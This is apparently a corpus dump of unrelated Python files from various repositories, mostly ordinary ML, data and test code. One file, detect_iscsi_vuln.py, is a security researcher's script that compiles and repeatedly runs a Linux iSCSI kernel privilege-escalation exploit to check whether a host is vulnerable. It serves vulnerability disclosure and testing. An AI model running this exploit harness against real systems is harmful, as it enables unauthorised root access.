for logger in self.loggers.values():
logger.log_hparams(*args, **kwargs, runner=self)
def log_metrics(self, *args, **kwargs) -> None:
"""Logs batch, loader and epoch metrics to available loggers."""
for logger in self.loggers.values():
logger.log_metrics(*args, **kwargs, runner=self)
def flush_log(self) -> None:
"""Flushes the loggers."""
for logger in self.loggers.values():
logger.flush_log()
def close_log(self) -> None:
"""Closes the loggers."""
for logger in self.loggers.values():
logger.close_log()
@abstractmethod
def get_engine(self) -> Engine:
"""Returns the engine for the experiment."""
pass
def get_loggers(self) -> Dict[str, ILogger]:
"""Returns the loggers for the experiment."""
return {}
@abstractmethod
def get_loaders(self) -> "OrderedDict[str, DataLoader]":
"""Returns the loaders for the experiment."""
pass
@abstractmethod
def get_model(self) -> RunnerModel:
"""Returns the model for the experiment."""
pass
def get_criterion(self) -> Optional[RunnerCriterion]:
"""Returns the criterion for the experiment."""
return None
def get_optimizer(self, model: RunnerModel) -> Optional[RunnerOptimizer]:
"""Returns the optimizer for the experiment."""
return None
def get_scheduler(self, optimizer: RunnerOptimizer) -> Optional[RunnerScheduler]:
"""Returns the scheduler for the experiment."""
return None
def get_callbacks(self) -> "OrderedDict[str, Callback]":
"""Returns the callbacks for the experiment."""
return {}
def _setup_loaders(self) -> None:
set_global_seed(self.seed + max(0, self.engine.process_index) + self.epoch_step)
loaders = self.get_loaders()
self.loaders = {
key: self.engine.prepare(value) for key, value in loaders.items()
}
def _setup_model(self) -> RunnerModel:
self.model = self.get_model()
return self.model
def _setup_criterion(self) -> RunnerCriterion:
self.criterion = self.get_criterion()
return self.criterion
def _setup_optimizer(self, model: RunnerModel = None) -> RunnerOptimizer:
if model is not None:
self.model = model
self.optimizer = self.get_optimizer(model=self.model)
return self.optimizer
def _setup_scheduler(self, optimizer: RunnerOptimizer = None) -> RunnerScheduler:
if optimizer is not None:
self.optimizer = optimizer
self.scheduler = self.get_scheduler(optimizer=self.optimizer)
return self.scheduler
def _setup_components(self) -> None:
set_global_seed(self.seed + max(0, self.engine.process_index) + self.epoch_step)
self.model = self._setup_model()
self.criterion = self._setup_criterion()
self.optimizer = self._setup_optimizer(model=self.model)
self.scheduler = self._setup_scheduler(optimizer=self.optimizer)
if isinstance(self.model, torch.nn.Module):
self.model = self.engine.prepare(self.model)
elif isinstance(self.model, dict):
self.model = {k: self.engine.prepare(v) for k, v in self.model.items()}
else:
raise NotImplementedError()
if isinstance(self.optimizer, torch.optim.Optimizer):
self.optimizer = self.engine.prepare(self.optimizer)
elif isinstance(self.optimizer, dict):
self.optimizer = {
k: self.engine.prepare(v) for k, v in self.optimizer.items()
}
elif self.optimizer is None:
pass
else:
raise NotImplementedError()
def _setup_callbacks(self):
set_global_seed(self.seed + max(0, self.engine.process_index) + self.epoch_step)
self.callbacks = sort_callbacks_by_order(self.get_callbacks())
check_callbacks(self.callbacks, self.criterion, self.optimizer, self.scheduler)
def on_experiment_start(self, runner: "IRunner"):
"""Event handler."""
self.epoch_step: int = 0
self.batch_step: int = 0
self.sample_step: int = 0
self.exception: Exception = None
self.need_early_stop: bool = False
# self.engine = self.get_engine()
self.engine.setup(local_rank=self._local_rank, world_size=self._world_size)
if self.engine.is_main_process:
self.loggers = self.get_loggers()
self.log_hparams(hparams=self.hparams)
with self.engine.local_main_process_first():
self._setup_loaders()
self._setup_components()
self._setup_callbacks()
def on_epoch_start(self, runner: "IRunner"):
"""Event handler."""
self.epoch_step += 1
self.epoch_metrics: Dict = defaultdict(None)
# storage for pure epoch-based metrics, like lr/momentum
self.epoch_metrics["_epoch_"] = {}
assert self.loaders is not None
for loader_key, loader in self.loaders.items():
if len(loader) == 0:
raise IRunnerError(f"DataLoader with name {loader_key} is empty.")
set_global_seed(self.seed + max(0, self.engine.process_index) + self.epoch_step)
def on_loader_start(self, runner: "IRunner"):
"""Event handler."""
assert self.loader is not None
self.is_train_loader: bool = self.loader_key.startswith("train")
self.is_valid_loader: bool = self.loader_key.startswith("valid")
self.is_infer_loader: bool = self.loader_key.startswith("infer")
assert self.is_train_loader or self.is_valid_loader or self.is_infer_loader
self.loader_batch_size: int = get_loader_batch_size(self.loader)
self.loader_batch_len: int = len(self.loader)
self.loader_sample_len: int = get_loader_num_samples(self.loader)
self.loader_batch_step: int = 0
self.loader_sample_step: int = 0
self.loader_metrics: Dict = defaultdict(None)
if self.loader_batch_len == 0:
raise IRunnerError(f"DataLoader with name {self.loader_key} is empty.")
set_global_seed(self.seed + max(0, self.engine.process_index) + self.epoch_step)
maybe_recursive_call(self.model, "train", mode=self.is_train_loader)
if isinstance(self.loader.sampler, DistributedSampler):
self.loader.sampler.set_epoch(self.epoch_step)
def on_batch_start(self, runner: "IRunner"):
"""Event handler."""
if isinstance(self.batch, dict):
self.batch_size = len(next(iter(self.batch.values())))
else:
self.batch_size = len(self.batch[0])
# we have an batch per each worker...
self.batch_step += self.engine.num_processes
self.loader_batch_step += self.engine.num_processes
self.sample_step += self.batch_size * self.engine.num_processes
self.loader_sample_step += self.batch_size * self.engine.num_processes
self.batch_metrics: Dict = defaultdict(None)
def on_batch_end(self, runner: "IRunner"):
"""Event handler."""
# batch-metrics sync under ddp setup is too computation heavy
# if self.engine.distributed_type == DistributedType.NO: # @TODO: recheck
self.log_metrics(metrics=self.batch_metrics, scope="batch")
def on_loader_end(self, runner: "IRunner"):
"""Event handler."""
self.log_metrics(metrics=self.loader_metrics, scope="loader")
self.epoch_metrics[self.loader_key] = {
key: float(value) for key, value in self.loader_metrics.items()
}
def on_epoch_end(self, runner: "IRunner"):
"""Event handler."""
self.log_metrics(metrics=self.epoch_metrics, scope="epoch")
self.experiment_metrics[self.epoch_step] = self.epoch_metrics.copy()
self.flush_log()
def on_experiment_end(self, runner: "IRunner"):
"""Event handler."""
self.flush_log()
self.close_log()
self.engine.cleanup()
def on_exception(self, runner: "IRunner"):
"""Event handler."""
raise self.exception
def _run_event(self, event: str) -> None:
if is_str_intersections(event, ("_start",)):
getattr(self, event)(self)
for callback in self.callbacks.values():
getattr(callback, event)(self)
if is_str_intersections(event, ("_end", "_exception")):
getattr(self, event)(self)
@abstractmethod
def handle_batch(self, batch: Mapping[str, Any]) -> None:
"""
Inner method to handle specified data batch.
Used to make a train/valid/infer step during Experiment run.
Args:
batch (Mapping[str, Any]): dictionary with data batches from DataLoader.
"""
pass
def _run_loader(self) -> None:
with torch.set_grad_enabled(self.is_train_loader):
for self.batch in self.loader:
if self.need_early_stop:
self.need_early_stop = False
break
self._run_event("on_batch_start")
self.handle_batch(batch=self.batch)
self._run_event("on_batch_end")
def _run_epoch(self) -> None:
for self.loader_key, self.loader in self.loaders.items():
self._run_event("on_loader_start")
self._run_loader()
self._run_event("on_loader_end")
def _run_experiment(self) -> None:
while self.epoch_step < self.num_epochs:
if self.need_early_stop:
break
self._run_event("on_epoch_start")
self._run_epoch()
self._run_event("on_epoch_end")
def _run_local(self, local_rank: int = -1, world_size: int = 1) -> None:
self._local_rank, self._world_size = local_rank, world_size
self._run_event("on_experiment_start")
self._run_experiment()
self._run_event("on_experiment_end")
def _run(self) -> None:
self.engine = self.get_engine()
self.engine.spawn(self._run_local)
def run(self) -> "IRunner":
"""Runs the experiment.
Returns:
self, `IRunner` instance after the experiment
"""
try:
self._run()
except (Exception, KeyboardInterrupt) as ex:
self.exception = ex
self._run_event("on_exception")
return self
__all__ = ["IRunner", "IRunnerError"]
|
src/GridCal/update.py | mzy2240/GridCal | 284 | 12718367 | import subprocess
import sys
import pkg_resources
from GridCal.__version__ import __GridCal_VERSION__
def find_latest_version(name='GridCal'):
"""
Find the latest version of a package
:param name: name of the Package
:return: version string
"""
latest_version = str(subprocess.run([sys.executable, '-m', 'pip', 'install', '{}==random'.format(name)],
capture_output=True, text=True))
latest_version = latest_version[latest_version.find('(from versions:') + 15:]
latest_version = latest_version[:latest_version.find(')')]
latest_version = latest_version.replace(' ', '').split(',')[-1]
return latest_version
def check_version():
"""
Check package version
:return: version status code, pipy version string
version status code:
-2: failure
-1: this is a newer version
0: we are ok
+1: we are behind pipy, we can update
"""
latest_version = find_latest_version()
pipy_version = pkg_resources.parse_version(latest_version)
gc_version = pkg_resources.parse_version(__GridCal_VERSION__)
if pipy_version is None:
# could not connect
return -2, '0.0.0'
else:
if hasattr(pipy_version, 'release'):
if pipy_version.release is None:
# could not connect
return -2, '0.0.0'
if pipy_version == gc_version:
# same version, we're up to date
return 0, latest_version
elif pipy_version > gc_version:
# we have an older version, we may update
return 1, latest_version
elif pipy_version < gc_version:
# this version is newer than PiPy's
return -1, latest_version
else:
return 0, latest_version
def get_upgrade_command(latest_version=None):
"""
Get GridCal update command
:return:
"""
if latest_version is None:
latest_version = find_latest_version()
cmd = [sys.executable, '-m', 'pip', 'install',
'GridCal=={}'.format(latest_version),
'--upgrade',
'--no-dependencies']
return cmd
if __name__ == '__main__':
is_latest, curr_ver = check_version()
print('is the latest', is_latest, curr_ver)
|
tests/utils.py | d-hoke/py-pdf-parser | 186 | 12718404 | import re
from typing import NamedTuple, Callable, Dict, List, Optional, Union
from py_pdf_parser.components import PDFElement, PDFDocument, ElementOrdering
from py_pdf_parser.sectioning import Section
from pdfminer.layout import LTComponent
from py_pdf_parser.common import BoundingBox
from py_pdf_parser.loaders import Page
class FakePDFMinerCharacter(NamedTuple):
fontname: str = "fake_fontname"
height: float = 10
class FakePDFMinerIterator:
def __init__(self, font_name: str = "fake_font", font_size: float = 10):
self.finished = False
self.font_name = font_name
self.font_size = font_size
def __next__(self):
if self.finished:
raise StopIteration()
self.finished = True
return [FakePDFMinerCharacter(fontname=self.font_name, height=self.font_size)]
class FakePDFMinerTextElement(LTComponent):
"""
This is a stub to help create something which looks like a PDFMiner text element
for use in testing.
The fontname and size are detected by getting the first character of the first row
of the contained text. This is done by iterating, hence we define an iterator which
simply returns one list of length one and then raises StopIteration. This is the
minimum needed to pretend to allow extraction of the first character, for which
we use the FakeCharacter namedtuple which has fontname and height attibutes set.
"""
def __init__(
self,
bounding_box: "BoundingBox" = BoundingBox(0, 1, 0, 1),
text: str = "fake_text",
font_name: str = "fake_font",
font_size: float = 10,
):
super().__init__(
bbox=[bounding_box.x0, bounding_box.y0, bounding_box.x1, bounding_box.y1]
)
self.text = text
self.font_name = font_name
self.font_size = font_size
def __iter__(self):
return FakePDFMinerIterator(font_name=self.font_name, font_size=self.font_size)
def get_text(self) -> str:
if self.text is None:
return ""
return self.text
def create_pdf_element(
bounding_box: "BoundingBox" = BoundingBox(0, 1, 0, 1),
text: str = "fake_text",
font_name: str = "fake_font",
font_size: float = 10,
font_mapping: Optional[Dict[str, str]] = None,
font_mapping_is_regex: bool = False,
regex_flags: Union[int, re.RegexFlag] = 0,
font_size_precision: int = 1,
) -> "PDFElement":
document = create_pdf_document(
elements=[
FakePDFMinerTextElement(
bounding_box, text=text, font_name=font_name, font_size=font_size
)
],
font_mapping=font_mapping,
font_mapping_is_regex=font_mapping_is_regex,
regex_flags=regex_flags,
font_size_precision=font_size_precision,
)
return document.elements[0]
def create_pdf_document(
elements: Union[List[LTComponent], Dict[int, List[LTComponent]]],
font_mapping: Optional[Dict[str, str]] = None,
font_mapping_is_regex: bool = False,
regex_flags: Union[int, re.RegexFlag] = 0,
font_size_precision: int = 1,
element_ordering: Union[
ElementOrdering, Callable[[List], List]
] = ElementOrdering.LEFT_TO_RIGHT_TOP_TO_BOTTOM,
) -> "PDFDocument":
"""
Creates a PDF document with the given elements.
"elements" can be a list of elements (in which case a document with a single page
will be created) or a dictionary mapping page number to its list of elements.
"""
if not isinstance(elements, dict):
pages = {1: Page(elements=elements, width=100, height=100)}
else:
pages = {
page_number: Page(elements=elements_list, width=100, height=100)
for page_number, elements_list in elements.items()
}
return PDFDocument(
pages=pages,
font_mapping=font_mapping,
font_mapping_is_regex=font_mapping_is_regex,
regex_flags=regex_flags,
font_size_precision=font_size_precision,
element_ordering=element_ordering,
)
def create_section(
document: "PDFDocument",
name: str = "fake_name",
unique_name: str = "fake_name_1",
start_element: Optional["PDFElement"] = None,
end_element: Optional["PDFElement"] = None,
) -> "Section":
"""
Creates a simple section
"""
if start_element is None:
start_element = document._element_list[0]
if end_element is None:
end_element = document._element_list[-1]
return Section(document, name, unique_name, start_element, end_element)
|
psdaq/psdaq/pyxpm/surf/devices/intel/_EM22xx.py | ZhenghengLi/lcls2 | 134 | 12718412 | <gh_stars>100-1000
#-----------------------------------------------------------------------------
# This file is part of the 'SLAC Firmware Standard Library'. It is subject to
# the license terms in the LICENSE.txt file found in the top-level directory
# of this distribution and at:
# https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html.
# No part of the 'SLAC Firmware Standard Library', including this file, may be
# copied, modified, propagated, or distributed except according to the terms
# contained in the LICENSE.txt file.
#-----------------------------------------------------------------------------
import pyrogue as pr
import surf.protocols.i2c
class EM22xx(surf.protocols.i2c.PMBus):
def __init__(self, **kwargs):
super().__init__(**kwargs)
literalDataFormat = surf.protocols.i2c.getPMbusLiteralDataFormat
linearDataFormat = surf.protocols.i2c.getPMbusLinearDataFormat
self.add(pr.LinkVariable(
name = 'VIN',
mode = 'RO',
units = 'V',
disp = '{:1.3f}',
linkedGet = literalDataFormat,
dependencies = [self.READ_VIN],
))
self.add(pr.LinkVariable(
name = 'VOUT',
mode = 'RO',
units = 'V',
disp = '{:1.3f}',
linkedGet = linearDataFormat,
dependencies = [self.VOUT_MODE,self.READ_VOUT],
))
self.VOUT_MODE._default = 0x13
self.add(pr.LinkVariable(
name = 'IOUT',
mode = 'RO',
units = 'A',
disp = '{:1.3f}',
linkedGet = literalDataFormat,
dependencies = [self.READ_IOUT],
))
self.add(pr.LinkVariable(
name = 'TEMPERATURE[1]',
mode = 'RO',
units = 'degC',
disp = '{:1.3f}',
linkedGet = literalDataFormat,
dependencies = [self.READ_TEMPERATURE_1],
))
self.add(pr.LinkVariable(
name = 'TEMPERATURE[2]',
mode = 'RO',
units = 'degC',
disp = '{:1.3f}',
linkedGet = literalDataFormat,
dependencies = [self.READ_TEMPERATURE_2],
))
self.add(pr.LinkVariable(
name = 'DUTY_CYCLE',
mode = 'RO',
units = '%',
disp = '{:1.3f}',
linkedGet = literalDataFormat,
dependencies = [self.READ_DUTY_CYCLE],
))
self.add(pr.LinkVariable(
name = 'FREQUENCY',
mode = 'RO',
units = 'kHz',
disp = '{:1.3f}',
linkedGet = literalDataFormat,
dependencies = [self.READ_FREQUENCY],
))
self.add(pr.LinkVariable(
name = 'POUT',
mode = 'RO',
units = 'W',
disp = '{:1.3f}',
linkedGet = literalDataFormat,
dependencies = [self.READ_POUT],
))
|
backpack/extensions/curvmatprod/ggnmp/pooling.py | jabader97/backpack | 395 | 12718449 | <reponame>jabader97/backpack
from backpack.core.derivatives.avgpool2d import AvgPool2DDerivatives
from backpack.core.derivatives.maxpool2d import MaxPool2DDerivatives
from backpack.extensions.curvmatprod.ggnmp.ggnmpbase import GGNMPBase
class GGNMPAvgPool2d(GGNMPBase):
def __init__(self):
super().__init__(derivatives=AvgPool2DDerivatives())
class GGNMPMaxpool2d(GGNMPBase):
def __init__(self):
super().__init__(derivatives=MaxPool2DDerivatives())
|
2021.03.12-linux-iscsi/detect_iscsi_vuln.py | jeffball55/NotQuite0DayFriday | 756 | 12718471 | <reponame>jeffball55/NotQuite0DayFriday
#!/usr/bin/env python
# I
# ,I~
# II7 __ __ _____ _ _
# ,: :I+7~ : \ \ / / / ____| (_) | |
# ~~ 77+?7 ,== \ \ / / ___ _ __ | (___ _ __ _ __ _ | |_ ___
# ===, =II+ 7+ :~==, \ \/ / / _ \ | '__| \___ \ | '_ \ | '__| | | | __| / _ \
# =+, ,=III77777= ~~~ \ / | __/ | | ____) | | |_) | | | | | | |_ | __/
# , ?IIII77777777: : \/ \___| |_| |_____/ | .__/ |_| |_| \__| \___|
# IIIIII77777777$~ | |
# ~?II~ ?7I ,77$7= |_|
# :=???+IIIII 7 77$$$$$$$I:
# :++??+~::IIIII= :I77$$7IIII$$Z7=
# ~??????IIIII7, 7777$$::I7$Z7=
# ,+I?IIIII7 77777$$$7+:
# ?IIIII7 I77777$,
# =IIIIII777777 ______ _ _ _____ _ _
# ~=: ,I777777I, ~= | ____| | | | | / ____| (_) | |
# ~===, :I,+77~ ~~== | |__ __ __ ___ | | __ __ ___ __| | | (___ ___ ___ _ _ _ __ _ | |_ _ _
# :=~ I7+77 :==, | __| \ \ / / / _ \ | | \ \ / / / _ \ / _` | \___ \ / _ \ / __| | | | | | '__| | | | __| | | | |
# ,: ,7I7: ,~, | |____ \ V / | (_) | | | \ V / | __/ | (_| | ____) | | __/ | (__ | |_| | | | | | | |_ | |_| |
# I7I |______| \_/ \___/ |_| \_/ \___| \__,_| |_____/ \___| \___| \__,_| |_| |_| \__| \__, |
# 7, __/ |
# = |___/
#
# Detect script by @meecles
#
from pathlib import Path
from shutil import copyfile
import subprocess
import os
import sys
sub_uname = subprocess.run(['uname', '-r'], stdout=subprocess.PIPE)
version = sub_uname.stdout.decode("utf-8").rstrip()
elversion = version.split(".")[len(version.split(".")) - 2]
depriv_user = None
sysmap = "/boot/System.map-{}".format(version)
exploit_setup = False
def is_root():
return os.geteuid() == 0
def get_addr(item):
sub = subprocess.run(["grep", item, sysmap], stdout=subprocess.PIPE)
return sub.stdout.decode("utf-8").rstrip()
def recompile():
os.system("cp symbols.c symbols.c.bak")
os.system("rm symbols.c")
sub = subprocess.run(["sh", "utilities/build_symbols.sh"], stdout=subprocess.PIPE)
res = sub.stdout.decode("utf-8").rstrip()
arr = res.split("//###")
syms = arr[0]
inject = arr[1]
new_lines = []
template = open("symbols.template.c", "r")
lines = template.readlines()
for line in lines:
if "##ARR_SYMBOLS##" in line:
new_lines.append(syms + "\n")
elif "##ARR_ADD##" in line:
new_lines.append(inject + "\n")
else:
new_lines.append(line)
symbols = open("symbols.c", "w")
symbols.writelines(new_lines)
symbols.close()
return True
def setup_exploit(add_symbols=False):
global exploit_setup
files = ["a.sh", "exploit.c", "Makefile"] # Check if some of the files exist
for file in files:
p = Path("./{}".format(file))
if not p.is_file():
return False
if add_symbols:
recompile()
copyfile("a.sh", "/tmp/a.sh")
os.system("chmod +x /tmp/a.sh")
os.system("make")
exploit_setup = True
return True
def run_exploit():
# We're root, so run as a deprivileged user
sub = subprocess.run(["su", "-c", "./exploit", depriv_user], stdout=subprocess.PIPE)
res = sub.stdout.decode("utf-8").rstrip()
return res
def check(vers="Unknown Version"):
global symbol_mem
global symbol_touser
print("{} detected, checking for symbols".format(vers))
if vers != "CentOS 8" or vers.startswith("CentOS 8"):
print("Recompiling to add symbol offsets")
setup_exploit(add_symbols=True)
print("Built, continuing")
required_symbols = [
"\<seq_buf_putmem\>", "\<seq_buf_to_user\>", "module_kset", "param_array_free", "\<memcpy\>", "\<modules\>",
"run_cmd", "\<netlink_sock_destruct$"
]
for symbol in required_symbols:
sym = get_addr(symbol)
if len(sym) < 1:
print("Failed to read symbols")
return False
print("Found all the symbols")
success = False
res = None
for i in range(0, 20 if "-fast" not in sys.argv else 3):
res = run_exploit()
if res.endswith("Success"):
success = True
break
if success:
print("Exploit ran!")
return True
if res is not None and res.endswith("Failed to detect kernel slide"):
print("Exploit failed, but is likely to succeed if you reboot. Most likely vulnerable.")
return False
print("Failed to run exploit but found symbols, possibly vulnerable but current exploit not possible")
return False
def verify_success():
sub = subprocess.run(["ls", "-l", "/tmp/proof"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
res = sub.stdout.decode("utf-8").rstrip()
er = sub.stderr.decode("utf-8").rstrip()
return res is not None and len(res) > 5 and "root" in res and depriv_user not in res
if __name__ == '__main__':
if not is_root():
print("Please run with sudo or as root")
quit()
if len(sys.argv) > 1:
depriv_user = sys.argv[1]
if depriv_user is None:
print("Please provide username of non-admin user\nUsage: python3 detect.py user")
quit()
if "-compile" in sys.argv:
recompile()
quit()
if elversion == "el8" or elversion.startswith("el8"):
num = "8"
if elversion != "el8" and "_" in elversion:
num = "8." + elversion.split("_")[1]
if check(vers="CentOS {}".format(num)):
verified = verify_success()
if verified:
print("Vulnerable!")
else:
print("Exploit ran, but was unable to verify that it worked")
else:
print("Not vulnerable!")
elif elversion == "el7":
if check(vers="CentOS 7"):
verified = verify_success()
if verified:
print("Vulnerable!")
else:
print("Exploit ran, but was unable to verify that it worked")
else:
print("Not vulnerable!")
else:
success = check()
if success:
print("Found memory symbols")
verify_success()
|
terrascript/provider/DTherHtun/idm.py | mjuenema/python-terrascript | 507 | 12718477 | <filename>terrascript/provider/DTherHtun/idm.py
# terrascript/provider/DTherHtun/idm.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:19:03 UTC)
import terrascript
class idm(terrascript.Provider):
"""Terrafrom Provider for Redhat IDM"""
__description__ = "Terrafrom Provider for Redhat IDM"
__namespace__ = "DTherHtun"
__name__ = "idm"
__source__ = "https://github.com/DTherHtun/terraform-provider-idm"
__version__ = "0.0.2"
__published__ = "2020-06-11T08:01:15Z"
__tier__ = "community"
__all__ = ["idm"]
|
app/extensions/default_view/__init__.py | Allen7D/mini-shop-server | 533 | 12718546 | <reponame>Allen7D/mini-shop-server
# _*_ coding: utf-8 _*_
"""
Created by Allen7D on 2020/6/9.
"""
from importlib import import_module
from flask import current_app, render_template, redirect
from app.core.error import APIException
__author__ = 'Allen7D'
def apply_default_view(app):
'''
:param app: Flask实例
:return:
'''
app.config.from_object('app.extensions.default_view.config')
@app.route('/')
def index():
'''跳转到「首页」'''
url = {
'github': current_app.config['GITHUB_URL'],
'doc': current_app.config['DOC_URL'],
}
return render_template("index.html", url=url)
@app.route('/doc')
def doc():
'''跳转到「api文档」'''
return redirect('/apidocs/#/')
apply_error_code_view(app)
def apply_error_code_view(app):
def load_exception():
module = import_module('app.libs.error_code')
exception_list = []
for elem_name in dir(module):
elem = getattr(module, elem_name)
if type(elem) == type and issubclass(elem, APIException):
exception_list.append(elem())
exception_list.sort(key=lambda x: x.error_code)
return exception_list
exception_list = load_exception()
@app.route('/error_code')
def error_code():
return render_template('error_code.html', exception_list=exception_list)
|
icevision/models/ross/efficientdet/prediction.py | ai-fast-track/mantisshrimp | 580 | 12718557 | __all__ = ["predict", "predict_from_dl", "convert_raw_predictions", "end2end_detect"]
from icevision.imports import *
from icevision.utils import *
from icevision.core import *
from icevision.data import *
from icevision.models.utils import _predict_from_dl
from icevision.models.ross.efficientdet.dataloaders import *
from effdet import DetBenchTrain, DetBenchPredict, unwrap_bench
from icevision.models.inference import *
@torch.no_grad()
def _predict_batch(
model: Union[DetBenchTrain, DetBenchPredict],
batch: Sequence[torch.Tensor],
records: Sequence[BaseRecord],
detection_threshold: float = 0.5,
keep_images: bool = False,
device: Optional[torch.device] = None,
) -> List[Prediction]:
device = device or model_device(model)
imgs, img_info = batch
imgs = imgs.to(device)
img_info = {k: v.to(device) for k, v in img_info.items()}
bench = DetBenchPredict(unwrap_bench(model))
bench = bench.eval().to(device)
raw_preds = bench(x=imgs, img_info=img_info)
preds = convert_raw_predictions(
batch=batch,
raw_preds=raw_preds,
records=records,
detection_threshold=detection_threshold,
keep_images=keep_images,
)
return preds
def predict(
model: Union[DetBenchTrain, DetBenchPredict],
dataset: Dataset,
detection_threshold: float = 0.5,
keep_images: bool = False,
device: Optional[torch.device] = None,
) -> List[Prediction]:
batch, records = build_infer_batch(dataset)
return _predict_batch(
model=model,
batch=batch,
records=records,
detection_threshold=detection_threshold,
keep_images=keep_images,
device=device,
)
def predict_from_dl(
model: nn.Module,
infer_dl: DataLoader,
show_pbar: bool = True,
keep_images: bool = False,
**predict_kwargs,
):
return _predict_from_dl(
predict_fn=_predict_batch,
model=model,
infer_dl=infer_dl,
show_pbar=show_pbar,
keep_images=keep_images,
**predict_kwargs,
)
def convert_raw_predictions(
batch,
raw_preds: torch.Tensor,
records: Sequence[BaseRecord],
detection_threshold: float,
keep_images: bool = False,
) -> List[Prediction]:
tensor_images, *_ = batch
dets = raw_preds.detach().cpu().numpy()
preds = []
for det, record, tensor_image in zip(dets, records, tensor_images):
if detection_threshold > 0:
scores = det[:, 4]
keep = scores > detection_threshold
det = det[keep]
pred = BaseRecord(
(
ScoresRecordComponent(),
ImageRecordComponent(),
InstancesLabelsRecordComponent(),
BBoxesRecordComponent(),
)
)
pred.detection.set_class_map(record.detection.class_map)
pred.detection.set_labels_by_id(det[:, 5].astype(int))
pred.detection.set_bboxes([BBox.from_xyxy(*xyxy) for xyxy in det[:, :4]])
pred.detection.set_scores(det[:, 4])
if keep_images:
record.set_img(tensor_to_image(tensor_image))
preds.append(Prediction(pred=pred, ground_truth=record))
return preds
end2end_detect = partial(_end2end_detect, predict_fn=predict)
|
gunicorn/tests/test_metadata.py | vbarbaresi/integrations-core | 663 | 12718572 | <reponame>vbarbaresi/integrations-core<gh_stars>100-1000
# (C) Datadog, Inc. 2018-present
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
import pytest
from datadog_checks.gunicorn import GUnicornCheck
from .common import CHECK_NAME, CONTAINER_NAME, GUNICORN_VERSION, INSTANCE
# TODO: Test metadata in e2e when we can collect metadata from the agent
CHECK_ID = 'test:123'
def _assert_metadata(datadog_agent):
major, minor, patch = GUNICORN_VERSION.split('.')
version_metadata = {
'version.scheme': 'semver',
'version.major': major,
'version.minor': minor,
'version.patch': patch,
'version.raw': GUNICORN_VERSION,
}
datadog_agent.assert_metadata(CHECK_ID, version_metadata)
datadog_agent.assert_metadata_count(5)
@pytest.mark.skipif(not GUNICORN_VERSION, reason='Require GUNICORN_VERSION')
def test_collect_metadata_instance(aggregator, datadog_agent, setup_gunicorn):
instance = INSTANCE.copy()
instance['gunicorn'] = setup_gunicorn['gunicorn_bin_path']
check = GUnicornCheck(CHECK_NAME, {}, [instance])
check.check_id = CHECK_ID
check.check(instance)
_assert_metadata(datadog_agent)
@pytest.mark.skipif(not GUNICORN_VERSION, reason='Require GUNICORN_VERSION')
def test_collect_metadata_init_config(aggregator, datadog_agent, setup_gunicorn):
init_config = {'gunicorn': setup_gunicorn['gunicorn_bin_path']}
check = GUnicornCheck(CHECK_NAME, init_config, [INSTANCE])
check.check_id = CHECK_ID
check.check(INSTANCE)
_assert_metadata(datadog_agent)
@pytest.mark.skipif(not GUNICORN_VERSION, reason='Require GUNICORN_VERSION')
@pytest.mark.usefixtures('dd_environment')
def test_collect_metadata_docker(aggregator, datadog_agent, setup_gunicorn):
instance = INSTANCE.copy()
instance['gunicorn'] = 'docker exec {} gunicorn'.format(CONTAINER_NAME)
check = GUnicornCheck(CHECK_NAME, {}, [instance])
check.check_id = CHECK_ID
check.check(instance)
_assert_metadata(datadog_agent)
def test_collect_metadata_count(aggregator, datadog_agent, setup_gunicorn):
instance = INSTANCE.copy()
instance['gunicorn'] = setup_gunicorn['gunicorn_bin_path']
check = GUnicornCheck(CHECK_NAME, {}, [instance])
check.check_id = 'test:123'
check.check(instance)
datadog_agent.assert_metadata_count(5)
def test_collect_metadata_invalid_binary(aggregator, datadog_agent, setup_gunicorn):
instance = INSTANCE.copy()
instance['gunicorn'] = '/bin/not_exist'
check = GUnicornCheck(CHECK_NAME, {}, [instance])
check.check_id = CHECK_ID
check.check(instance)
datadog_agent.assert_metadata_count(0)
|
src/streaming_prices.py | doc-jem/oandapyV20-examples | 127 | 12718588 | # -*- coding: utf-8 -*-
"""Streaming price data.
demonstrate the PricingStream request and convenient handling of data using Pydantic.
Usage:
streaming_prices.py --instrument <instrument> [--instrument <instrument>] [--nice] [--timeout <timeout>] [--count <count>]
Options:
--nice json indented formatting
--timeout=<timeout> timeout in seconds
--count=<count> # of records to receive [default: 0] unlimited
"""
import json
from oandapyV20 import API
from oandapyV20.exceptions import V20Error, StreamTerminated
from oandapyV20.endpoints.pricing import PricingStream
from exampleauth import exampleAuth
from requests.exceptions import ConnectionError
import logging
from typing import List
from pydantic import BaseModel
from datetime import datetime
logging.basicConfig(
filename="pricingstream.log",
level=logging.INFO,
format='%(asctime)s [%(levelname)s] %(name)s : %(message)s',
)
logger = logging.getLogger(__name__)
class HeartBeat(BaseModel):
type: str
time: datetime
class Price(BaseModel):
price: float
liquidity: int
class PriceRecord(BaseModel):
instrument: str
type: str
time: datetime
closeoutBid: float
closeoutAsk: float
status: str
tradeable: bool
bids: List[Price]
asks: List[Price]
def main(clargs):
accountID, access_token = exampleAuth()
request_params = {}
if clargs['--timeout']:
request_params = {"timeout": clargs['--timeout']}
# fetch MAXREC stream records
MAXREC = int(clargs['--count'])
api = API(access_token=access_token,
environment="practice",
request_params=request_params)
# setup the stream request
r = PricingStream(accountID=accountID,
params={"instruments": ",".join(clargs['<instrument>'])})
n = 0
_m = {"PRICE": PriceRecord,
"HEARTBEAT": HeartBeat}
while True:
try:
for rv in api.request(r):
# create a Pydantic record based on the type
rec = _m[rv['type']](**rv)
n += 1
if MAXREC and n >= MAXREC:
r.terminate("maxrecs received: {}".format(MAXREC))
print(rec.json() if clargs['--nice'] else rec)
except V20Error as e:
# catch API related errors that may occur
logger.error("V20Error: %s", e)
break
except ConnectionError as e:
logger.error("%s", e)
except StreamTerminated as e:
logger.error("Stopping: %s", e)
break
except Exception as e:
logger.error("%s", e)
break
if __name__ == '__main__':
from docopt import docopt
# commandline args ...
clargs = docopt(__doc__)
main(clargs)
|
office365/sharepoint/userprofiles/followedItem.py | wreiner/Office365-REST-Python-Client | 544 | 12718615 | from office365.runtime.client_value import ClientValue
class FollowedItem(ClientValue):
pass
|
freenom_dns_updater/exception/add_error.py | anhdhbn/Freenom-dns-updater | 160 | 12718625 | <reponame>anhdhbn/Freenom-dns-updater
from .dns_record_base_exception import DnsRecordBaseException
class AddError(DnsRecordBaseException):
pass
|
pyatv/auth/hap_pairing.py | Jacobs4/pyatv | 532 | 12718627 | <reponame>Jacobs4/pyatv
